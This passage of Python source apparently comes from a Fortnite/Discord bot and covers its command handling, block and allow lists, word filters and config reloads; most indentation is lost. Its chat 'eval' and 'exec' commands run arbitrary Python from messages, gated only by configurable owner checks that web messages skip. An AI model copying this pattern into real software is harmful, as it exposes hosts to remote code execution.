or (message.author.id in whitelist_ and data['discord']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(message, WebMessage):
client = message.client
if ((data['discord']['enabled'] and not dclient.isready)
or (not client.web)):
return
if (len(con) > 1
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
check_ownercommand = False
check_ng = False
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
elif isinstance(message, AllMessage):
client = message.client
if data['discord']['enabled'] and not dclient.isready:
return
if (len(con) > 1
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
base = message.base
while isinstance(base, AllMessage):
base = base.base
if isinstance(base, fortnitepy.message.MessageBase):
client.add_cache(message.author)
if ((message.author.id in blacklist and data['fortnite']['blacklist-ignorecommand'])
or (message.author.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['ignorebot'])):
return
if isinstance(base, fortnitepy.FriendMessage):
if not client.whisper:
if client.whisperperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}]',content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
elif isinstance(base, fortnitepy.PartyMessage):
if not client.partychat:
if client.partychatperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
display_name = client.is_most()
if display_name:
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{l("party")}] [{display_name}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}]',content,add_p=lambda x:f'[{now()}] [{l("party")}/{client.party.id}] [{display_name}] {name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}] | {x}',add_d=lambda x:f'[{l("party")}/{client.party.id}] [{display_name}] {x}')
if rawcontent in commands['me']:
rawcontent = message.author.id
content_ = message.author.id
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(base, discord.message.Message):
if ((message.author.id == dclient.user.id)
or (message.author.id in blacklist_ and data['discord']['blacklist-ignorecommand'])
or (message.author.bot and data['discord']['ignorebot'])):
return
if not client.discord:
if client.discordperfect:
return
elif message.author.id not in [owner.id for owner in dclient.owner] and message.author.id not in whitelist_:
return
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}({dclient.user})] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}({dclient.user})] {x}')
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(base, WebMessage):
if ((data['discord']['enabled'] and not dclient.isready)
or (not client.web)):
return
check_ownercommand = False
check_ng = False
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
if not client.isready:
return
display_name = name(client.user)
do_itemsearch = True
if check_ownercommand:
for command in commands['ownercommands']:
if command in ("cid_", "bid_", "petcarrier_", "pickaxe_id_", "eid_", "emoji_", "toy_"):
if args[0].startswith(command):
await reply(message, client, l("this_command_owneronly"))
return
elif command == "item-search":
do_itemsearch = False
elif args[0] in commands[command]:
await reply(message, client, l("this_command_owneronly"))
return
reply_flag = False
for key,value in replies.items():
reply_flag_ = False
if data["replies-matchmethod"] == "contains":
if [k for k in key.split(',') if k in content]:
reply_flag_ = True
elif data["replies-matchmethod"] == "full":
if [k for k in key.split(',') if k == content]:
reply_flag_ = True
elif data["replies-matchmethod"] == "starts":
if [k for k in key.split(',') if content.startswith(k)]:
reply_flag_ = True
elif data["replies-matchmethod"] == "ends":
if [k for k in key.split(',') if content.endswith(k)]:
reply_flag_ = True
if reply_flag_:
reply_flag = True
var = defaultdict(lambda: None)
var.update(client.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"author_display_name": message.author.display_name,
"author_id": message.author.id
}
)
mes = eval_format(value,var)
await reply(message, client, mes)
if check_ng:
flag = False
if data["ng-word-matchmethod"] == "contains":
if [ng for ng in data["ng-words"] if ng in content]:
flag = True
elif data["ng-word-matchmethod"] == "full":
if [ng for ng in data["ng-words"] if ng == content]:
flag = True
elif data["ng-word-matchmethod"] == "starts":
if [ng for ng in data["ng-words"] if content.startswith(ng)]:
flag = True
elif data["ng-word-matchmethod"] == "ends":
if [ng for ng in data["ng-words"] if content.endswith(ng)]:
flag = True
if flag:
if data["ng-word-blacklist"]:
if isinstance(message, fortnitepy.message.MessageBase):
blacklist.append(message.author.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"].append(message.author.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
elif isinstance(message, discord.Message):
blacklist_.append(message.author.id)
data_ = load_json("config.json")
data_["discord"]["blacklist"].append(message.author.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
member = client.party.get_member(message.author.id)
if member and client.party.me.leader:
if data["ng-word-kick"]:
try:
await member.kick()
except Exception as e:
if data["loglevel"] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
elif data["ng-word-chatban"]:
try:
await member.chatban()
except Exception as e:
if data["loglevel"] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
return
if reply_flag:
return
if args[0] in commands['prev']:
c = client.prevmessage.get(message.author.id)
if c:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
await task
                result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
client.prevmessage[message.author.id] = content
if args[0] in commands['eval']:
try:
if rawcontent == "":
await reply(message, client, f"[{commands['eval']}] [{l('eval')}]")
return
variable = globals()
variable.update(locals())
if rawcontent.startswith("await "):
if data['loglevel'] == "debug":
send(display_name,f"await eval({rawcontent.replace('await ','',1)})",yellow,add_d=lambda x:f'```\n{x}\n```')
result = await eval(rawcontent.replace("await ","",1), variable)
send(display_name,str(result))
await reply(message, client, str(result))
else:
if data['loglevel'] == "debug":
send(display_name,f"eval {rawcontent}",yellow,add_d=lambda x:f'```\n{x}\n```')
result = eval(rawcontent, variable)
send(display_name,str(result))
await reply(message, client, str(result))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
elif args[0] in commands['exec']:
try:
if rawcontent == "":
await reply(message, client, f"[{commands['exec']}] [{l('exec')}]")
return
variable = globals()
variable.update(locals())
result = await aexec(content.replace(f"{args[0]} ","",1), variable)
await reply(message, client, str(result))
except Exception as e:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
if data['discord']['enabled']:
if args[0] in commands['addblacklist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['addblacklist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id not in blacklist_:
blacklist_.append(user.id)
data_ = load_json("config.json")
data_["discord"]["blacklist"].append(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('discord_blacklist')),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('discord_blacklist')))
else:
await reply(message, client, l('already_list', f'{name(user)}', l('discord_blacklist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeblacklist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['removeblacklist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id in blacklist_:
blacklist_.remove(user.id)
data_ = load_json("config.json")
data_["discord"]["blacklist"].remove(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', f'{name(user)}', l('discord_blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', f'{name(user)}', l('discord_blacklist')))
else:
await reply(message, client, l('not_list', f'{name(user)}', l('discord_blacklist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l('user_notfound'),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,traceback.format_exc(),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addwhitelist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['addwhitelist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id not in whitelist_:
whitelist_.append(user.id)
data_ = load_json("config.json")
data_["discord"]["whitelist"].append(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
                        send(display_name,l('add_to_list', f'{name(user)}', l('discord_whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
                        await reply(message, client, l('add_to_list', f'{name(user)}', l('discord_whitelist')))
else:
await reply(message, client, l('already_list', f'{name(user)}', l('discord_whitelist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removewhitelist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['removewhitelist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id in whitelist_:
whitelist_.remove(user.id)
data_ = load_json("config.json")
data_["discord"]["whitelist"].remove(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', f'{name(user)}', l('discord_whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
                        await reply(message, client, l('remove_from_list', f'{name(user)}', l('discord_whitelist')))
else:
await reply(message, client, l('not_list', f'{name(user)}', l('discord_whitelist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
if args[0] in commands['restart']:
try:
if not client.acceptinvite:
if isinstance(message, fortnitepy.message.MessageBase) or isinstance(getattr(message,"base",None), fortnitepy.message.MessageBase):
if (not (message.author.id in [owner.id for owner in client.owner])
and not (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])
and not (message.author.id in [owner.id for owner in dclient.owner])
and not (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
await reply(message, client, l('invite_is_decline'))
return
await reply(message, client, l('restarting'))
Thread(target=restart,args=(0.5,)).start()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['relogin']:
try:
if client.acceptinvite is False:
if isinstance(message, fortnitepy.message.MessageBase) or isinstance(getattr(message,"base",None), fortnitepy.message.MessageBase):
if (not (message.author.id in [owner.id for owner in client.owner])
and not (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])
and not (message.author.id in [owner.id for owner in dclient.owner])
and not (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
await reply(message, client, l('invite_is_decline'))
return
await reply(message, client, l('relogining'))
await client.restart()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['reload']:
success = load_config(client)
try:
if success:
await reply(message, client, l('success'))
else:
await reply(message, client, l('error'))
return
try:
if data['fortnite']['avatar_id'] == "{bot}":
client.set_avatar(fortnitepy.Avatar(asset=client.party.me.outfit, background_colors=data['fortnite']['avatar_color']))
else:
client.set_avatar(fortnitepy.Avatar(asset=data['fortnite']['avatar_id'].format(bot=client.party.me.outfit), background_colors=data['fortnite']['avatar_color']))
except Exception:
if data['loglevel'] == 'debug':
send(name(client.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
client.owner = []
for owner in data['fortnite']['owner']:
user = client.get_user(owner) or client.get_cache_user(owner)
if not user:
try:
user = await client.fetch_user(owner)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("owner_notfound",owner),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
friend = client.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_owner",commands["reload"]),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not client.is_pending(user.id):
try:
await client.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
client.owner.append(friend)
send(display_name,f'{l("owner")}: {name(friend)}',green,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
if client.owner and data['fortnite']['click_invite']:
for owner in client.owner:
await owner.send(l("click_invite"))
lists = {
"blacklist": "blacklist",
"whitelist": "whitelist",
"otherbotlist": "botlist"
}
async def _(listuser: str) -> None:
user = client.get_user(listuser) or client.get_cache_user(listuser)
if not user:
try:
user = await client.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{data_}_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
if data_ == "blacklist" and data["fortnite"]["blacklist-autoblock"]:
try:
await user.block()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
globals()[list_].append(user.id)
for list_,data_ in lists.items():
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite'][list_]])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f"fortnite {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
lists = [
"outfitmimic",
"backpackmimic",
"pickaxemimic",
"emotemimic"
]
async def _(mimic: str) -> None:
if isinstance(data['fortnite'][mimic],str):
                        user = client.get_user(data['fortnite'][mimic]) or client.get_cache_user(data['fortnite'][mimic])
if not user:
try:
user = await client.fetch_user(data['fortnite'][mimic])
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{mimic}_user_notfound",data['fortnite'][mimic]),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
setattr(client,mimic,user.id)
if data['loglevel'] == "debug":
send(display_name,f"{mimic} {getattr(client,mimic)}",yellow,add_d=lambda x:f'```\n{x}\n```')
try:
await asyncio.gather(*[_(mimic) for mimic in lists])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def _(listuser: str) -> None:
user = client.get_user(listuser) or client.get_cache_user(listuser)
if not user:
try:
user = await client.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("invitelist_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
friend = client.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_inviteuser",listuser,commands["reload"]),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not client.is_pending(user.id) and user.id != client.user.id:
try:
await client.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.invitelist.append(friend.id)
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite']['invitelist']])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f'invitelist {client.invitelist}',yellow,add_d=lambda x:f'```\n{x}\n```')
if data['fortnite']['acceptfriend']:
async def _(pending: fortnitepy.IncomingPendingFriend) -> None:
if client.acceptfriend is True:
try:
await pending.accept()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif client.acceptfriend is False:
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await asyncio.gather(*[_(pending) for pending in client.incoming_pending_friends])
except Exception:
data["discord"]["enabled"] = False
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['discord']['enabled'] and dclient.isready:
dclient_user = name(dclient.user)
dclient.owner = []
for owner in data['discord']['owner']:
user = dclient.get_user(owner)
if not user:
try:
user = await dclient.fetch_user(owner)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l('error_while_requesting_userinfo'),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(dclient_user,l('discord_owner_notfound',owner),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
else:
dclient.owner.append(user)
send(dclient_user,f"{l('owner')}: {name(user)}",green,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}')
lists = {
"blacklist_": "blacklist",
"whitelist_": "whitelist"
}
async def _(listuser: str) -> None:
listuser = int(listuser)
user = dclient.get_user(listuser)
if not user:
try:
user = await dclient.fetch_user(listuser)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l(f'discord_{data_}_user_notfound', listuser),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
return
globals()[list_].append(user.id)
for list_,data_ in lists.items():
await asyncio.gather(*[_(listuser) for listuser in data['discord'][data_]])
if data['loglevel'] == "debug":
send(dclient_user,f"discord {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addblacklist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addblacklist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
                    users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id not in blacklist}
                else:
                    users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id not in blacklist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id not in blacklist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', len(users)))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id not in blacklist:
blacklist.append(user.id)
if user.display_name:
data["fortnite"]["blacklist"].append(user.display_name)
else:
data["fortnite"]["blacklist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('blacklist')))
else:
await reply(message, client, l('already_list', f'{name(user)}', l('blacklist')))
else:
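# Several matches: stash one exec snippet and variable set per candidate in
# client.select, so the author's numeric reply can run the chosen snippet.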
client.select[message.author.id] = {
"exec": [
"""\
if user.id not in blacklist:
blacklist.append(user.id)
if user.display_name:
data["fortnite"]["blacklist"].append(user.display_name)
else:
data["fortnite"]["blacklist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('blacklist')))
else:
await reply(message, client, l('already_list', f'{name(user)}', l('blacklist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_add_to_list', l('blacklist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeblacklist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removeblacklist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id in blacklist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id in blacklist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id in blacklist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id in blacklist:
blacklist.remove(user.id)
try:
data["fortnite"]["blacklist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["blacklist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', name(user), l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', name(user), l('blacklist')))
else:
await reply(message, client, l('not_list', name(user), l('blacklist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id in blacklist:
blacklist.remove(user.id)
try:
data["fortnite"]["blacklist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["blacklist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', name(user), l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', name(user), l('blacklist')))
else:
await reply(message, client, l('not_list', name(user), l('blacklist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_from_list', l('blacklist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addwhitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addwhitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id not in whitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id not in whitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id not in whitelist:
